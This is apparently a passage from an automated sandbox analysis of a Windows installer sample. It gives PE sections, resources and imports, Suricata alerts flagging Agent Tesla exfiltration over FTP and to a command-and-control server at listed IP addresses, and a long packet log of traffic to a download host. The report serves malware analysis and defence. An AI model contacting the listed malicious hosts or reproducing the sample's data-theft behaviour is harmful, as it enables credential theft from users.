IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x7000	0x2b8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x5e66	0x6000	e8f12472e91b02deb619070e6ee7f1f4	False	0.6566569010416666	data	6.419409887460116	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x7000	0x1354	0x1400	2222fe44ebbadbc32af32dfc9c88e48e	False	0.4306640625	data	5.037511188789184	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x9000	0x202d8	0x600	a5ec1b720d350c6303a7aba8d85072bf	False	0.4733072916666667	data	3.7600484096214832	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x2a000	0x2a000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x54000	0x2d490	0x2d600	3469fad129cc4f5d98277ff568dc0969	False	0.603391873278237	data	6.111326163907691	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x54358	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	English	United States	0.376375251390039
RT_ICON	0x64b80	0xe444	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9933089191594223
RT_ICON	0x72fc8	0x5488	Device independent bitmap graphic, 72 x 144 x 32, image size 21600	English	United States	0.4520794824399261
RT_ICON	0x78450	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	English	United States	0.4557156353330184
RT_ICON	0x7c678	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.5064315352697095
RT_ICON	0x7ec20	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.551829268292683
RT_ICON	0x7fcc8	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	English	United States	0.6086065573770492
RT_ICON	0x80650	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.6719858156028369
RT_DIALOG	0x80ab8	0x100	data	English	United States	0.5234375
RT_DIALOG	0x80bb8	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x80cd8	0xc4	data	English	United States	0.5918367346938775
RT_DIALOG	0x80da0	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x80e00	0x76	data	English	United States	0.7542372881355932
RT_VERSION	0x80e78	0x310	data	English	United States	0.4846938775510204
RT_MANIFEST	0x81188	0x305	XML 1.0 document, ASCII text, with very long lines (773), with no line terminators	English	United States	0.5614489003880984

Imports

DLL	Import
KERNEL32.dll	CompareFileTime, SearchPathW, SetFileTime, CloseHandle, GetShortPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, GetFullPathNameW, CreateDirectoryW, Sleep, GetTickCount, CreateFileW, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, SetFileAttributesW, ExpandEnvironmentStringsW, SetErrorMode, LoadLibraryW, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, lstrcpyA, lstrcpyW, lstrcatW, GetSystemDirectoryW, GetVersion, GetProcAddress, LoadLibraryA, GetModuleHandleA, GetModuleHandleW, lstrcmpiW, lstrcmpW, WaitForSingleObject, GlobalFree, GlobalAlloc, LoadLibraryExW, GetExitCodeProcess, FreeLibrary, WritePrivateProfileStringW, GetCommandLineW, GetTempPathW, GetPrivateProfileStringW, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, WriteFile, lstrlenA, WideCharToMultiByte
USER32.dll	EndDialog, ScreenToClient, GetWindowRect, RegisterClassW, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, wsprintfW, CreateWindowExW, SystemParametersInfoW, AppendMenuW, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, GetDC, SetWindowLongW, LoadImageW, SendMessageTimeoutW, FindWindowExW, EmptyClipboard, OpenClipboard, TrackPopupMenu, EndPaint, ShowWindow, GetDlgItem, IsWindow, SetForegroundWindow
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
ADVAPI32.dll	RegCloseKey, RegOpenKeyExW, RegDeleteKeyW, RegDeleteValueW, RegEnumValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	CoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
VERSION.dll	GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-31T10:36:19.109989+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.9	49974	45.43.14.134	80	TCP
2024-10-31T10:36:26.833874+0100	2029927	ET MALWARE AgentTesla Exfil via FTP	1	192.168.2.9	49976	203.161.184.34	21	TCP
2024-10-31T10:36:27.737298+0100	2855542	ETPRO MALWARE Agent Tesla CnC Exfil Activity	1	192.168.2.9	49977	203.161.184.34	50430	TCP
2024-10-31T10:36:27.742987+0100	2855542	ETPRO MALWARE Agent Tesla CnC Exfil Activity	1	192.168.2.9	49977	203.161.184.34	50430	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 31, 2024 10:36:18.381017923 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:18.385864973 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:18.385987043 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:18.386198044 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:18.391021967 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.109726906 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.109756947 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.109771013 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.109786987 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.109819889 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.109833956 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.109988928 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:19.110085964 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:19.110089064 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.110106945 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.110121012 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.110131979 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.110171080 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:19.110232115 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:19.115099907 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.115144014 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.115156889 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.115293026 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:19.228426933 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.228486061 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.228499889 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.228523970 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:19.228559017 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:19.228626966 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.228682995 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:19.228684902 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.228698015 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.228728056 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:19.228749037 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:19.228959084 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.229034901 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.229048014 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.229054928 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:19.229089022 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:19.229106903 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:19.229201078 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.229213953 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.229254961 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:19.270112038 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.270147085 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.270160913 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.270179033 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:19.270215034 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:19.347394943 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.347438097 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.347450018 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.347524881 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:19.347596884 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.347599030 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:19.347610950 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.347702026 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:19.347716093 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.347781897 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:19.347841978 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.347913027 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:19.347915888 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.347929001 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.347992897 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:19.348059893 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.348118067 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:19.388792038 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.388818026 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.388830900 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.388911963 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.388984919 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:19.389122009 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:19.466381073 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.466423035 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.466495037 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.466509104 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.466521025 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:19.466556072 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:19.466623068 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.466670036 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:19.466708899 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.466747999 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:19.466829062 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.466840029 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.466852903 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.466865063 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.466876030 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:19.466886044 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:19.466922998 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:19.509084940 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.509104967 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.509186983 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.509200096 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.509303093 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.509313107 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:19.509413004 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:19.584980011 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.585046053 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.585059881 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.585124016 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.585155010 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:19.585170031 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.585256100 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:19.585283041 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.585295916 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.585306883 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.585366011 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:19.585484028 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.585551023 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:19.627388954 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.627430916 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.627445936 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.627543926 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:19.627564907 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.627584934 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.627645016 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:19.627804995 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.627880096 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:19.703845024 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.703869104 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.703883886 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.703897953 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.703998089 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.704011917 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.704042912 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:19.704124928 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.704169035 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:19.704224110 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:19.704231024 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.704304934 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:19.745091915 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.745141029 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.745153904 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.745291948 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:19.746423006 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.746474981 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.746488094 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.746530056 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:19.746611118 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:19.746640921 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.746712923 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:19.746742964 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.746786118 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.746788025 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:19.746835947 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:19.822777033 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.822794914 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.822854042 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:19.822881937 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:19.822918892 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.822966099 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:19.822968960 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.822983027 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.823014021 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:19.823024035 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:19.823163986 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.823177099 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.823210001 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:19.823219061 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:19.823617935 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.823667049 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:19.863974094 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.863993883 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.864008904 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.864023924 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:19.864051104 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:19.865361929 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.865401983 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:19.865456104 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.865490913 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.865499973 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:19.865504980 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.865520000 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:19.865530014 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:19.865690947 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.865727901 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:19.905800104 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.905819893 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.905885935 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:19.941917896 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.941939116 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.941952944 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.941999912 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.942022085 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:19.942059994 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:19.942059994 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:19.942061901 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.942121029 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:19.942413092 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.942428112 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.942441940 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.942475080 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:19.942496061 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:19.983146906 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.983251095 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.983263016 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.983269930 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:19.983324051 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:19.983324051 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:19.984169006 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.984216928 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:19.984231949 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.984245062 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.984272957 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:19.984297991 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:19.984421015 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.984431982 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:19.984467030 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:20.060724974 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:20.060766935 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:20.060779095 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:20.060796976 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:20.060826063 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:20.060895920 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:20.060937881 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:20.061001062 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:20.061014891 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:20.061049938 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:20.061187983 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:20.061199903 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:20.061239958 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:20.061558008 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:20.061604023 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:20.061631918 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:20.061671019 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:20.061738014 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:20.061757088 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:20.061779976 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:20.061794996 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:20.101787090 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:20.101814985 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:20.101828098 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:20.101902962 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:20.101943016 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:20.103319883 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:20.103362083 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:20.103369951 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:20.103375912 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:20.103401899 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:20.103416920 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:20.103533030 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:20.103545904 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:20.103579998 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:20.103593111 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:20.179441929 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:20.179492950 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:20.179505110 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:20.179522991 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:20.179555893 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:20.179586887 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:20.179626942 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:20.179814100 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:20.179826975 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:20.179902077 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:20.179918051 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:20.179965019 CET	49974	80	192.168.2.9	45.43.14.134
Oct 31, 2024 10:36:20.180197954 CET	80	49974	45.43.14.134	192.168.2.9
Oct 31, 2024 10:36:20.180253029 CET	49974	80	192.168.2.9	45.43.14.134
